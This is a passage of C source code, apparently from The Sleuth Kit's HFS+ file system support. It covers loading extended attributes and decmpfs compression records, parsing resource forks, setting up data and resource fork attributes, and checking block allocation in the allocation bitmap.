goto on_error;
}
// This is the length of the useful data, not including the record header
attributeLength = tsk_getu32(endian, attrData->attr_size);
// Check the attribute fits in the node
//if (recordType != HFS_ATTR_RECORD_INLINE_DATA) {
if (recOffset + keyLength + 2 + attributeLength > attrFile.nodeSize) {
error_detected(TSK_ERR_FS_READ,
"hfs_load_extended_attrs: Unable to process attribute");
goto on_error;
}
// attr_name_len is in UTF_16 chars
nameLength = tsk_getu16(endian, keyB->attr_name_len);
if (2*nameLength > HFS_MAX_ATTR_NAME_LEN_UTF16_B) {
error_detected(TSK_ERR_FS_CORRUPT,
"hfs_load_extended_attrs: Name length (%d) is too long.",
nameLength);
goto on_error;
}
buffer = tsk_malloc(attributeLength);
if (buffer == NULL) {
error_detected(TSK_ERR_AUX_MALLOC,
"hfs_load_extended_attrs: Could not malloc space for the attribute.");
goto on_error;
}
memcpy(buffer, attrData->attr_data, attributeLength);
// Use the "attr_name" part of the key as the attribute name
// but must convert to UTF8. Unfortunately, there does not seem to
// be any easy way to determine how long the converted string will
// be because UTF8 is a variable length encoding. However, the longest
// it will be is 3 * the max number of UTF16 code units. Add one for null
// termination. (thanks Judson!)
conversionResult = hfs_UTF16toUTF8(fs, keyB->attr_name,
nameLength, nameBuff, HFS_MAX_ATTR_NAME_LEN_UTF8_B+1, 0);
if (conversionResult != 0) {
error_returned
("-- hfs_load_extended_attrs could not convert the attr_name in the btree key into a UTF8 attribute name");
goto on_error;
}
// What is the type of this attribute? If it is a compression record, then
// use TSK_FS_ATTR_TYPE_HFS_COMP_REC. Else, use TSK_FS_ATTR_TYPE_HFS_EXT_ATTR
// Only "inline data" kind of record is handled.
if (strcmp(nameBuff, "com.apple.decmpfs") == 0 &&
tsk_getu32(endian, attrData->record_type) == HFS_ATTR_RECORD_INLINE_DATA) {
// Now, look at the compression record
DECMPFS_DISK_HEADER *cmph = (DECMPFS_DISK_HEADER *) buffer;
*cmpType =
tsk_getu32(TSK_LIT_ENDIAN, cmph->compression_type);
uint64_t uncSize = tsk_getu64(TSK_LIT_ENDIAN,
cmph->uncompressed_size);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: This attribute is a compression record.\n");
attrType = TSK_FS_ATTR_TYPE_HFS_COMP_REC;
*isCompressed = TRUE; // The data is governed by a compression record (but might not be compressed)
*uncompressedSize = uncSize;
switch (*cmpType) {
// Data is inline. We will load the uncompressed
// data as a resident attribute.
case DECMPFS_TYPE_ZLIB_ATTR:
if (!hfs_file_read_zlib_attr(
fs_file, buffer, attributeLength, uncSize))
{
goto on_error;
}
break;
case DECMPFS_TYPE_LZVN_ATTR:
if (!hfs_file_read_lzvn_attr(
fs_file, buffer, attributeLength, uncSize))
{
goto on_error;
}
break;
// Data is compressed in the resource fork
case DECMPFS_TYPE_ZLIB_RSRC:
case DECMPFS_TYPE_LZVN_RSRC:
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: Compressed data is in the file Resource Fork.\n", __func__);
break;
}
}
else { // Attribute name is NOT com.apple.decmpfs
attrType = TSK_FS_ATTR_TYPE_HFS_EXT_ATTR;
} // END if attribute name is com.apple.decmpfs ELSE clause
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_RES)) == NULL) {
error_returned(" - hfs_load_extended_attrs");
goto on_error;
}
if (tsk_verbose) {
tsk_fprintf(stderr,
"hfs_load_extended_attrs: loading attribute %s, type %u (%s)\n",
nameBuff, (uint32_t) attrType,
hfs_attrTypeName((uint32_t) attrType));
}
// set the details in the fs_attr structure
if (tsk_fs_attr_set_str(fs_file, fs_attr, nameBuff,
attrType, attribute_counter, buffer,
attributeLength)) {
error_returned(" - hfs_load_extended_attrs");
goto on_error;
}
free(buffer);
buffer = NULL;
++attribute_counter;
} // END if comp == 0
if (comp == 1) {
// since this record key is greater than our search key, all
// subsequent records will also be greater.
done = TRUE;
break;
}
} // END loop over records in one LEAF node
/*
* We get to this point if either:
*
* 1. We finish the loop over records and we are still loading attributes
* for the given file. In this case we are NOT done, and must read in
* the next leaf node, and process its records. The following code
* loads the next leaf node before we return to the top of the loop.
*
* 2. We "broke" out of the loop over records because we found a key
*    whose file ID is greater than the one we are working on. In that case
* we are done. The following code does not run, and we exit the
* while loop over successive leaf nodes.
*/
if (!done) {
// We did not finish loading the attributes when we got to the end of that node,
// so we must get the next node, and continue.
// First determine the nodeID of the next LEAF node
uint32_t newNodeID = tsk_getu32(endian, nodeDescriptor->flink);
//fprintf(stdout, "Next Node ID = %u\n", newNodeID);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Processed last record of THIS node, still gathering attributes.\n");
// If we are at the very last leaf node in the btree, then
// this "flink" will be zero. We break out of this loop over LEAF nodes.
if (newNodeID == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: But, there are no more leaf nodes, so we are done.\n");
break;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_extended_attrs: Reading the next LEAF node %"
PRIu32 ".\n", newNodeID);
nodeID = newNodeID;
cnt = tsk_fs_file_read(attrFile.file,
(TSK_OFF_T)nodeID * attrFile.nodeSize,
(char *) nodeData,
attrFile.nodeSize, (TSK_FS_FILE_READ_FLAG_ENUM) 0);
if (cnt != attrFile.nodeSize) {
error_returned
("hfs_load_extended_attrs: Could not read in the next LEAF node from the Attributes File btree");
goto on_error;
}
// Parse the Node header
nodeDescriptor = (hfs_btree_node *) nodeData;
// If we are NOT leaf node, then this is an error
if (nodeDescriptor->type != HFS_ATTR_NODE_LEAF) {
error_detected(TSK_ERR_FS_CORRUPT,
"hfs_load_extended_attrs: found a non-LEAF node as a successor to a LEAF node");
goto on_error;
}
} // END if(! done)
} // END while(! done) loop over successive LEAF nodes
on_exit:
free(nodeData);
tsk_list_free(nodeIDs_processed);
close_attr_file(&attrFile);
return 0;
on_error:
if (buffer != NULL) {
free(buffer);
}
if (nodeData != NULL) {
free(nodeData);
}
tsk_list_free(nodeIDs_processed);
close_attr_file(&attrFile);
return 1;
}
typedef struct RES_DESCRIPTOR {
char type[5]; // type is really 4 chars, but we will null-terminate
uint16_t id;
uint32_t offset;
uint32_t length;
char *name; // NULL if a name is not defined for this resource
struct RES_DESCRIPTOR *next;
} RES_DESCRIPTOR;
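/** \internal
 * Frees a linked list of resource descriptors produced by
 * hfs_parse_resource_fork(), including the name strings.
 */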
void
free_res_descriptor(RES_DESCRIPTOR * rd)
{
RES_DESCRIPTOR *nxt;
if (rd == NULL)
return;
nxt = rd->next;
if (rd->name != NULL)
free(rd->name);
free(rd);
free_res_descriptor(nxt); // tail recursive
}
/**
* The purpose of this function is to parse the resource fork of a file, and to return
* a data structure that is, in effect, a table of contents for the resource fork. The
* data structure is a null-terminated linked list of entries. Each one describes one
* resource. If the resource fork is empty, or if there is not a resource fork at all,
* or an error occurs, this function returns NULL.
*
* A non-NULL answer should be freed by the caller, using free_res_descriptor.
*
*/
static RES_DESCRIPTOR *
hfs_parse_resource_fork(TSK_FS_FILE * fs_file)
{
RES_DESCRIPTOR *result = NULL;
RES_DESCRIPTOR *last = NULL;
TSK_FS_INFO *fs_info;
hfs_fork *fork_info;
hfs_fork *resForkInfo;
uint64_t resSize;
const TSK_FS_ATTR *rAttr;
hfs_resource_fork_header rfHeader;
hfs_resource_fork_header *resHead;
uint32_t dataOffset;
uint32_t mapOffset;
uint32_t mapLength;
char *map;
int attrReadResult;
int attrReadResult1;
int attrReadResult2;
hfs_resource_fork_map_header *mapHdr;
uint16_t typeListOffset;
uint16_t nameListOffset;
unsigned char hasNameList;
char *nameListBegin = NULL;
hfs_resource_type_list *typeList;
uint16_t numTypes;
hfs_resource_type_list_item *tlItem;
int mindx; // index for looping over resource types
if (fs_file == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_parse_resource_fork: null fs_file");
return NULL;
}
if (fs_file->meta == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_parse_resource_fork: fs_file has null metadata");
return NULL;
}
if (fs_file->meta->content_ptr == NULL) {
if (tsk_verbose)
fprintf(stderr,
"hfs_parse_resource_fork: fs_file has null fork data structures, so no resources.\n");
return NULL;
}
// Extract the fs
fs_info = fs_file->fs_info;
if (fs_info == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_parse_resource_fork: null fs within fs_info");
return NULL;
}
// Try to look at the Resource Fork for an HFS+ file
// Should be able to cast this to hfs_fork *
fork_info = (hfs_fork *) fs_file->meta->content_ptr; // The data fork
// The resource fork is the second one.
resForkInfo = &fork_info[1];
resSize = tsk_getu64(fs_info->endian, resForkInfo->logic_sz);
//uint32_t numBlocks = tsk_getu32(fs_info->endian, resForkInfo->total_blk);
//uint32_t clmpSize = tsk_getu32(fs_info->endian, resForkInfo->clmp_sz);
// Hmm, certainly no resources here!
if (resSize == 0) {
return NULL;
}
// OK, resource size must be > 0
// find the attribute for the resource fork
rAttr =
tsk_fs_file_attr_get_type(fs_file, TSK_FS_ATTR_TYPE_HFS_RSRC,
HFS_FS_ATTR_ID_RSRC, TRUE);
if (rAttr == NULL) {
error_returned
("hfs_parse_resource_fork: could not get the resource fork attribute");
return NULL;
}
// JUST read the resource fork header
attrReadResult1 =
tsk_fs_attr_read(rAttr, 0, (char *) &rfHeader,
sizeof(hfs_resource_fork_header), TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult1 < 0
|| attrReadResult1 != sizeof(hfs_resource_fork_header)) {
error_returned
(" hfs_parse_resource_fork: trying to read the resource fork header");
return NULL;
}
// Begin to parse the resource fork
resHead = &rfHeader;
dataOffset = tsk_getu32(fs_info->endian, resHead->dataOffset);
mapOffset = tsk_getu32(fs_info->endian, resHead->mapOffset);
//uint32_t dataLength = tsk_getu32(fs_info->endian, resHead->dataLength);
mapLength = tsk_getu32(fs_info->endian, resHead->mapLength);
// Read in the WHOLE map
map = (char *) tsk_malloc(mapLength);
if (map == NULL) {
error_returned
("- hfs_parse_resource_fork: could not allocate space for the resource fork map");
return NULL;
}
attrReadResult =
tsk_fs_attr_read(rAttr, (uint64_t) mapOffset, map,
(size_t) mapLength, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult < 0 || attrReadResult != mapLength) {
error_returned
("- hfs_parse_resource_fork: could not read the map");
free(map);
return NULL;
}
mapHdr = (hfs_resource_fork_map_header *) map;
typeListOffset = tsk_getu16(fs_info->endian, mapHdr->typeListOffset);
nameListOffset = tsk_getu16(fs_info->endian, mapHdr->nameListOffset);
if (nameListOffset >= mapLength || nameListOffset == 0) {
hasNameList = FALSE;
}
else {
hasNameList = TRUE;
nameListBegin = map + nameListOffset;
}
typeList = (hfs_resource_type_list *) (map + typeListOffset);
numTypes = tsk_getu16(fs_info->endian, typeList->typeCount) + 1;
for (mindx = 0; mindx < numTypes; ++mindx) {
uint16_t numRes;
uint16_t refOff;
int pindx; // index for looping over resources
uint16_t rID;
uint32_t rOffset;
tlItem = &(typeList->type[mindx]);
numRes = tsk_getu16(fs_info->endian, tlItem->count) + 1;
refOff = tsk_getu16(fs_info->endian, tlItem->offset);
for (pindx = 0; pindx < numRes; ++pindx) {
int16_t nameOffset;
char *nameBuffer;
RES_DESCRIPTOR *rsrc;
char lenBuff[4]; // first 4 bytes of a resource encodes its length
uint32_t rLen; // Resource length
hfs_resource_refListItem *item =
((hfs_resource_refListItem *) (((uint8_t *) typeList) +
refOff)) + pindx;
nameOffset = tsk_gets16(fs_info->endian, item->resNameOffset);
nameBuffer = NULL;
if (hasNameList && nameOffset != -1) {
char *name = nameListBegin + nameOffset;
uint8_t nameLen = (uint8_t) name[0];
nameBuffer = tsk_malloc(nameLen + 1);
if (nameBuffer == NULL) {
error_returned
("hfs_parse_resource_fork: allocating space for the name of a resource");
free_res_descriptor(result);
return NULL;
}
memcpy(nameBuffer, name + 1, nameLen);
nameBuffer[nameLen] = (char) 0;
}
else {
nameBuffer = tsk_malloc(7);
if (nameBuffer == NULL) {
error_returned
("hfs_parse_resource_fork: allocating space for the (null) name of a resource");
free_res_descriptor(result);
return NULL;
}
memcpy(nameBuffer, "<none>", 6);
nameBuffer[6] = (char) 0;
}
rsrc = (RES_DESCRIPTOR *) tsk_malloc(sizeof(RES_DESCRIPTOR));
if (rsrc == NULL) {
error_returned
("hfs_parse_resource_fork: space for a resource descriptor");
free_res_descriptor(result);
return NULL;
}
// Build the linked list
if (result == NULL)
result = rsrc;
if (last != NULL)
last->next = rsrc;
last = rsrc;
rsrc->next = NULL;
rID = tsk_getu16(fs_info->endian, item->resID);
rOffset =
tsk_getu24(fs_info->endian,
item->resDataOffset) + dataOffset;
// Just read the first four bytes of the resource to get its length. It MUST
// be at least 4 bytes long
attrReadResult2 = tsk_fs_attr_read(rAttr, (uint64_t) rOffset,
lenBuff, (size_t) 4, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult2 != 4) {
error_returned
("- hfs_parse_resource_fork: could not read the 4-byte length at beginning of resource");
free_res_descriptor(result);
return NULL;
}
rLen = tsk_getu32(TSK_BIG_ENDIAN, lenBuff); //TODO
rsrc->id = rID;
rsrc->offset = rOffset + 4;
memcpy(rsrc->type, tlItem->type, 4);
rsrc->type[4] = (char) 0;
rsrc->length = rLen;
rsrc->name = nameBuffer;
} // END loop over resources of one type
} // END loop over resource types
return result;
}
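/** \internal
 * Loads the attributes (extended attributes, data fork, and resource fork)
 * of a file into fs_file->meta->attr. For compressed files, the default
 * DATA attribute is set up from either the inline decmpfs record or the
 * resource fork, depending on the compression type.
 *
 * @param fs_file file to load attributes for
 * @returns 1 on error, 0 on success
 */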
static uint8_t
hfs_load_attrs(TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs;
HFS_INFO *hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
hfs_fork *forkx;
unsigned char resource_fork_has_contents = FALSE;
unsigned char compression_flag = FALSE;
unsigned char isCompressed = FALSE;
unsigned char compDataInRSRCFork = FALSE;
unsigned char cmpType = 0;
uint64_t uncompressedSize;
uint64_t logicalSize; // of a fork
// clean up any error messages that are lying around
tsk_error_reset();
if ((fs_file == NULL) || (fs_file->meta == NULL)
|| (fs_file->fs_info == NULL)) {
error_detected(TSK_ERR_FS_ARG,
"hfs_load_attrs: fs_file or meta is NULL");
return 1;
}
fs = (TSK_FS_INFO *) fs_file->fs_info;
hfs = (HFS_INFO *) fs;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: Processing file %" PRIuINUM "\n",
fs_file->meta->addr);
// see if we have already loaded the runs
if (fs_file->meta->attr_state == TSK_FS_META_ATTR_STUDIED) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: Attributes already loaded\n");
return 0;
}
else if (fs_file->meta->attr_state == TSK_FS_META_ATTR_ERROR) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: Previous attempt to load attributes resulted in error\n");
return 1;
}
// Now (re)-initialize the attrlist that will hold the list of attributes
if (fs_file->meta->attr != NULL) {
tsk_fs_attrlist_markunused(fs_file->meta->attr);
}
else if (fs_file->meta->attr == NULL) {
fs_file->meta->attr = tsk_fs_attrlist_alloc();
}
/****************** EXTENDED ATTRIBUTES *******************************/
// We do these first, so that we can detect the mode of compression, if
// any. We need to know that mode in order to handle the forks.
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: loading the HFS+ extended attributes\n");
if (hfs_load_extended_attrs(fs_file, &isCompressed,
&cmpType, &uncompressedSize)) {
error_returned(" - hfs_load_attrs A");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
// TODO: What about DECMPFS_TYPE_RAW_RSRC?
switch (cmpType) {
case DECMPFS_TYPE_ZLIB_RSRC:
case DECMPFS_TYPE_LZVN_RSRC:
compDataInRSRCFork = TRUE;
break;
default:
compDataInRSRCFork = FALSE;
break;
}
if (isCompressed) {
fs_file->meta->size = uncompressedSize;
}
// This is the flag indicating compression, from the Catalog File record.
compression_flag = (fs_file->meta->flags & TSK_FS_META_FLAG_COMP) != 0;
if (compression_flag && !isCompressed) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: WARNING, HFS marks this as a"
" compressed file, but no compression record was found.\n");
}
if (isCompressed && !compression_flag) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: WARNING, this file has a compression"
" record, but the HFS compression flag is not set.\n");
}
/************* FORKS (both) ************************************/
// Process the data and resource forks. We only do this if the
// fork data structures are non-null, so test that:
if (fs_file->meta->content_ptr != NULL) {
/************** DATA FORK STUFF ***************************/
// Get the data fork data-structure
forkx = (hfs_fork *) fs_file->meta->content_ptr;
// If this is a compressed file, then either this attribute is already loaded
// because the data was in the compression record, OR
// the compressed data is in the resource fork. We will load those runs when
// we handle the resource fork.
if (!isCompressed) {
// We only load this attribute if this fork has non-zero length
// or if this is a REG or LNK file. Otherwise, we skip
logicalSize = tsk_getu64(fs->endian, forkx->logic_sz);
if (logicalSize > 0 ||
fs_file->meta->type == TSK_FS_META_TYPE_REG ||
fs_file->meta->type == TSK_FS_META_TYPE_LNK) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: loading the data fork attribute\n");
// get an attribute structure to store the data in
if ((fs_attr = tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_load_attrs");
return 1;
}
/* NOTE that fs_attr is now tied to fs_file->meta->attr.
* that means that we do not need to free it if we abort in the
* following code (and doing so will cause double free errors). */
if (logicalSize > 0) {
// Convert runs of blocks to the TSK internal form
if (((attr_run =
hfs_extents_to_attr(fs, forkx->extents,
0)) == NULL)
&& (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_load_attrs");
return 1;
}
// add the runs to the attribute and the attribute to the file.
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run,
"", TSK_FS_ATTR_TYPE_HFS_DATA,
HFS_FS_ATTR_ID_DATA, logicalSize, logicalSize,
(TSK_OFF_T) tsk_getu32(fs->endian,
forkx->total_blk) * fs->block_size, 0,
0)) {
error_returned(" - hfs_load_attrs (DATA)");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if extents file has additional runs
if (hfs_ext_find_extent_record_attr(hfs,
(uint32_t) fs_file->meta->addr, fs_attr,
TRUE)) {
error_returned(" - hfs_load_attrs B");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
}
else {
// logicalSize == 0, but this is either a REG or LNK file
// so, it should have a DATA fork attribute of zero length.
if (tsk_fs_attr_set_run(fs_file, fs_attr, NULL, "",
TSK_FS_ATTR_TYPE_HFS_DATA, HFS_FS_ATTR_ID_DATA,
0, 0, 0, 0, 0)) {
error_returned(" - hfs_load_attrs (non-file)");
return 1;
}
}
} // END logicalSize>0 or REG or LNK file type
} // END if not Compressed
/************** RESOURCE FORK STUFF ************************************/
// Get the resource fork.
//Note that content_ptr points to an array of two
// hfs_fork data structures, the second of which
// describes the blocks of the resource fork.
forkx = &((hfs_fork *) fs_file->meta->content_ptr)[1];
logicalSize = tsk_getu64(fs->endian, forkx->logic_sz);
// Skip if the length of the resource fork is zero
if (logicalSize > 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: loading the resource fork\n");
resource_fork_has_contents = TRUE;
// get an attribute structure to store the resource fork data in. We will
// reuse the fs_attr variable, since we are done with the data fork.
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_load_attrs (RSRC)");
return 1;
}
/* NOTE that fs_attr is now tied to fs_file->meta->attr.
* that means that we do not need to free it if we abort in the
* following code (and doing so will cause double free errors). */
// convert the resource fork to the TSK format
if (((attr_run =
hfs_extents_to_attr(fs, forkx->extents,
0)) == NULL)
&& (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_load_attrs");
return 1;
}
// add the runs to the attribute and the attribute to the file.
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, "RSRC",
TSK_FS_ATTR_TYPE_HFS_RSRC, HFS_FS_ATTR_ID_RSRC,
tsk_getu64(fs->endian, forkx->logic_sz),
tsk_getu64(fs->endian, forkx->logic_sz),
(TSK_OFF_T) tsk_getu32(fs->endian,
forkx->total_blk) * fs->block_size, 0, 0)) {
error_returned(" - hfs_load_attrs (RSRC)");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if extents file has additional runs for the resource fork.
if (hfs_ext_find_extent_record_attr(hfs,
(uint32_t) fs_file->meta->addr, fs_attr, FALSE)) {
error_returned(" - hfs_load_attrs C");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
if (isCompressed && compDataInRSRCFork) {
// OK, we are going to load those same resource fork blocks as the "DATA"
// attribute, but will mark it as compressed.
// get an attribute structure to store the resource fork data in. We will
// reuse the fs_attr variable, since we are done with the data fork.
if (tsk_verbose)
tsk_fprintf(stderr,
"File is compressed with data in the resource fork. "
"Loading the default DATA attribute.\n");
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned
(" - hfs_load_attrs (RSRC loading as DATA)");
return 1;
}
/* NOTE that fs_attr is now tied to fs_file->meta->attr.
* that means that we do not need to free it if we abort in the
* following code (and doing so will cause double free errors). */
switch (cmpType) {
case DECMPFS_TYPE_ZLIB_RSRC:
#ifdef HAVE_LIBZ
fs_attr->w = hfs_attr_walk_zlib_rsrc;
fs_attr->r = hfs_file_read_zlib_rsrc;
#else
// We don't have zlib, so the uncompressed data is not
// available to us; however, we must have a default DATA
// attribute, or icat will misbehave.
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: No zlib compression library, so setting a zero-length default DATA attribute.\n");
if (tsk_fs_attr_set_run(fs_file, fs_attr, NULL, "DATA",
TSK_FS_ATTR_TYPE_HFS_DATA, HFS_FS_ATTR_ID_DATA, 0,
0, 0, 0, 0)) {
error_returned(" - hfs_load_attrs (non-file)");
return 1;
}
#endif
break;
case DECMPFS_TYPE_LZVN_RSRC:
fs_attr->w = hfs_attr_walk_lzvn_rsrc;
fs_attr->r = hfs_file_read_lzvn_rsrc;
break;
}
// convert the resource fork to the TSK format
if (((attr_run =
hfs_extents_to_attr(fs, forkx->extents,
0)) == NULL)
&& (tsk_error_get_errno() != 0)) {
error_returned
(" - hfs_load_attrs, RSRC fork as DATA fork");
return 1;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: Loading RSRC fork block runs as the default DATA attribute.\n");
// add the runs to the attribute and the attribute to the file.
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, "DECOMP",
TSK_FS_ATTR_TYPE_HFS_DATA, HFS_FS_ATTR_ID_DATA,
logicalSize,
logicalSize,
(TSK_OFF_T) tsk_getu32(fs->endian,
forkx->total_blk) * fs->block_size,
TSK_FS_ATTR_COMP | TSK_FS_ATTR_NONRES, 0)) {
error_returned
(" - hfs_load_attrs (RSRC loading as DATA)");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if extents file has additional runs for the resource fork.
if (hfs_ext_find_extent_record_attr(hfs,
(uint32_t) fs_file->meta->addr, fs_attr, FALSE)) {
error_returned
(" - hfs_load_attrs (RSRC loading as DATA");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: setting the \"special\" function pointers to inflate compressed data.\n");
}
} // END resource fork size > 0
} // END the fork data structures are non-NULL
if (isCompressed && compDataInRSRCFork && !resource_fork_has_contents) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: WARNING, compression record claims that compressed data"
" is in the Resource Fork, but that fork is empty or non-existent.\n");
}
// Finish up.
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/** \internal
* Get allocation status of file system block.
* adapted from IsAllocationBlockUsed from:
* http://developer.apple.com/technotes/tn/tn1150.html
*
* @param hfs File system being analyzed
* @param a_addr Block address
* @returns 1 if allocated, 0 if not, -1 on error
*/
static int8_t
hfs_block_is_alloc(HFS_INFO * hfs, TSK_DADDR_T a_addr)
{
TSK_FS_INFO *fs = &(hfs->fs_info);
TSK_OFF_T b;
size_t b2;
// lazy loading
if (hfs->blockmap_file == NULL) {
if ((hfs->blockmap_file =
tsk_fs_file_open_meta(fs, NULL,
HFS_ALLOCATION_FILE_ID)) == NULL) {
tsk_error_errstr2_concat(" - Loading blockmap file");
return -1;
}
/* cache the data attribute */
hfs->blockmap_attr =
tsk_fs_attrlist_get(hfs->blockmap_file->meta->attr,
TSK_FS_ATTR_TYPE_DEFAULT);
if (!hfs->blockmap_attr) {
tsk_error_errstr2_concat
(" - Data Attribute not found in Blockmap File");
return -1;
}
hfs->blockmap_cache_start = -1;
hfs->blockmap_cache_len = 0;
}
// get the byte offset
b = (TSK_OFF_T) a_addr / 8;
if (b > hfs->blockmap_file->meta->size) {
tsk_error_set_errno(TSK_ERR_FS_CORRUPT);
tsk_error_set_errstr("hfs_block_is_alloc: block %" PRIuDADDR
" is too large for bitmap (%" PRIuOFF ")", a_addr,
hfs->blockmap_file->meta->size);
return -1;
}
// see if it is in the cache
if ((hfs->blockmap_cache_start == -1)
|| (hfs->blockmap_cache_start > b)
|| (hfs->blockmap_cache_start + hfs->blockmap_cache_len <= b)) {
ssize_t cnt = tsk_fs_attr_read(hfs->blockmap_attr, b,
hfs->blockmap_cache,
sizeof(hfs->blockmap_cache), 0);
if (cnt < 1) {
tsk_error_set_errstr2
("hfs_block_is_alloc: Error reading block bitmap at offset %"
PRIuOFF, b);
return -1;
}
hfs->blockmap_cache_start = b;
hfs->blockmap_cache_len = cnt;
}
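// The allocation file is a bitmap in which the most significant bit of
// each byte corresponds to the lowest-numbered block covered by that byte,
// hence the (7 - (a_addr % 8)) bit index below.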
b2 = (size_t) (b - hfs->blockmap_cache_start);
return (hfs->blockmap_cache[b2] & (1 << (7 - (a_addr % 8)))) != 0;
}
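/** \internal
* Get the allocation flags for a single file system block.
*
* @param a_fs File system being analyzed
* @param a_addr Block address
* @returns TSK_FS_BLOCK_FLAG_ALLOC if the block is allocated, otherwise
* TSK_FS_BLOCK_FLAG_UNALLOC
*/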
TSK_FS_BLOCK_FLAG_ENUM
hfs_block_getflags(TSK_FS_INFO * a_fs, TSK_DADDR_T a_addr)
{
return (hfs_block_is_alloc((HFS_INFO *) a_fs, a_addr) == 1) ?
TSK_FS_BLOCK_FLAG_ALLOC : TSK_FS_BLOCK_FLAG_UNALLOC;
}
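/** \internal
* Walk a range of file system blocks and call a callback for each block
* that matches the given flags.
*
* @param fs File system being analyzed
* @param start_blk First block to walk
* @param end_blk Last block to walk (inclusive)
* @param flags Flags that determine which blocks are passed to the callback
* @param action Callback function
* @param ptr Pointer passed to the callback
* @returns 1 on error and 0 on success
*/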
static uint8_t
hfs_block_walk(TSK_FS_INFO * fs, TSK_DADDR_T start_blk,
TSK_DADDR_T end_blk, TSK_FS_BLOCK_WALK_FLAG_ENUM flags,
TSK_FS_BLOCK_WALK_CB action, void *ptr)
{
char *myname = "hfs_block_walk";
HFS_INFO *hfs = (HFS_INFO *) fs;
TSK_FS_BLOCK *fs_block;
TSK_DADDR_T addr;
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: start_blk: %" PRIuDADDR " end_blk: %"
PRIuDADDR " flags: %" PRIu32 "\n", myname, start_blk, end_blk,
flags);
// clean up any error messages that are lying around
tsk_error_reset();
/*
* Sanity checks.
*/
if (start_blk < fs->first_block || start_blk > fs->last_block) {
tsk_error_set_errno(TSK_ERR_FS_WALK_RNG);
tsk_error_set_errstr("%s: invalid start block number: %" PRIuDADDR
"", myname, start_blk);
return 1;
}
if (end_blk < fs->first_block || end_blk > fs->last_block) {
tsk_error_set_errno(TSK_ERR_FS_WALK_RNG);
tsk_error_set_errstr("%s: invalid last block number: %" PRIuDADDR
"", myname, end_blk);
return 1;
}
if (start_blk > end_blk)
XSWAP(start_blk, end_blk);
/* Sanity check on flags -- make sure at least one ALLOC is set */
if (((flags & TSK_FS_BLOCK_WALK_FLAG_ALLOC) == 0) &&
((flags & TSK_FS_BLOCK_WALK_FLAG_UNALLOC) == 0)) {
flags |=
(TSK_FS_BLOCK_WALK_FLAG_ALLOC |
TSK_FS_BLOCK_WALK_FLAG_UNALLOC);
}
if (((flags & TSK_FS_BLOCK_WALK_FLAG_META) == 0) &&
((flags & TSK_FS_BLOCK_WALK_FLAG_CONT) == 0)) {
flags |=
(TSK_FS_BLOCK_WALK_FLAG_CONT | TSK_FS_BLOCK_WALK_FLAG_META);
}
if ((fs_block = tsk_fs_block_alloc(fs)) == NULL) {
return 1;
}
/*
* Iterate
*/
for (addr = start_blk; addr <= end_blk; ++addr) {
int retval;
int myflags;
/* identify if the block is allocated or not */
myflags = hfs_block_is_alloc(hfs, addr) ?
TSK_FS_BLOCK_FLAG_ALLOC : TSK_FS_BLOCK_FLAG_UNALLOC;
// test if we should call the callback with this one
if ((myflags & TSK_FS_BLOCK_FLAG_ALLOC)
&& (!(flags & TSK_FS_BLOCK_WALK_FLAG_ALLOC)))
continue;
else if ((myflags & TSK_FS_BLOCK_FLAG_UNALLOC)
&& (!(flags & TSK_FS_BLOCK_WALK_FLAG_UNALLOC)))
continue;
if (flags & TSK_FS_BLOCK_WALK_FLAG_AONLY)
myflags |= TSK_FS_BLOCK_FLAG_AONLY;
if (tsk_fs_block_get_flag(fs, fs_block, addr,
(TSK_FS_BLOCK_FLAG_ENUM) myflags) == NULL) {
tsk_fs_block_free(fs_block);
return 1;
}
retval = action(fs_block, ptr);
